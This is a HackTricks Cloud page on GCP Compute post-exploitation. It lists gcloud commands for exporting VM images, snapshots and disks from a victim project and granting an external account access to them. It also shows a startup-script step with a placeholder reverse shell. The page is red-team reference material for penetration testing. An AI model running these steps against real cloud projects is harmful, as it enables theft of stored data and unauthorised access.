GCP - Compute Post Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Compute

For more information about Compute and VPC (Networking) check:

GCP - Compute Enum

Export & Inspect Images locally

This would allow an attacker to access the data contained inside already existing images or create new images of running VMs and access their data without having access to the running VM.

It’s possible to export a VM image to a bucket and then download it and mount it locally with the command:

Export and download VM image

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Fore performing this action the attacker might need privileges over the storage bucket and for sure privileges over cloudbuild as it’s the service which is going to be asked to perform the export
Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com needs:

roles/iam.serviceAccountTokenCreator
roles/compute.admin
roles/iam.serviceAccountUser

And the SA <project-id>-compute@developer.gserviceaccount.com needs:

oles/compute.storageAdmin
roles/storage.objectAdmin

Export & Inspect Snapshots & Disks locally

It’s not possible to directly export snapshots and disks, but it’s possible to transform a snapshot in a disk, a disk in an image and following the previous section, export that image to inspect it locally

Create disk from snapshot and image from disk

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Inspect an Image creating a VM

With the goal of accessing the data stored in an image or inside a running VM from where an attacker has created an image, it possible to grant an external account access over the image:

Grant access to image and create VM

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
  --member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
  --role='roles/compute.imageUser'

and then create a new VM from it:

Create VM instance from image

gcloud compute instances create [INSTANCE_NAME] \
  --project=[TARGET_PROJECT_ID] \
  --zone=[ZONE] \
  --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

If you could not give your external account access over image, you could launch a VM using that image in the victims project and make the metadata execute a reverse shell to access the image adding the param:

Create VM with reverse shell in metadata

    --metadata startup-script='#! /bin/bash
        echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.

Or you could grant an external account access over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):

Grant access to disk

gcloud projects add-iam-policy-binding [PROJECT_ID] \
  --member='user:[USER_EMAIL]' \
  --role='roles/compute.storageAdmin'

Attach the disk to an instance:

Attach disk to instance

gcloud compute instances attach-disk [INSTANCE_NAME] \
  --disk [DISK_NAME] \
  --zone [ZONE]

Mount the disk inside the VM:

SSH into the VM:

SSH into VM and mount disk

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.
Format and Mount the Disk (if it’s a new or raw disk):
- Create a mount point:
  Create mount point and mount
```
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
- Mount the disk:
  Mount disk device
```
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```

If you cannot give access to a external project to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.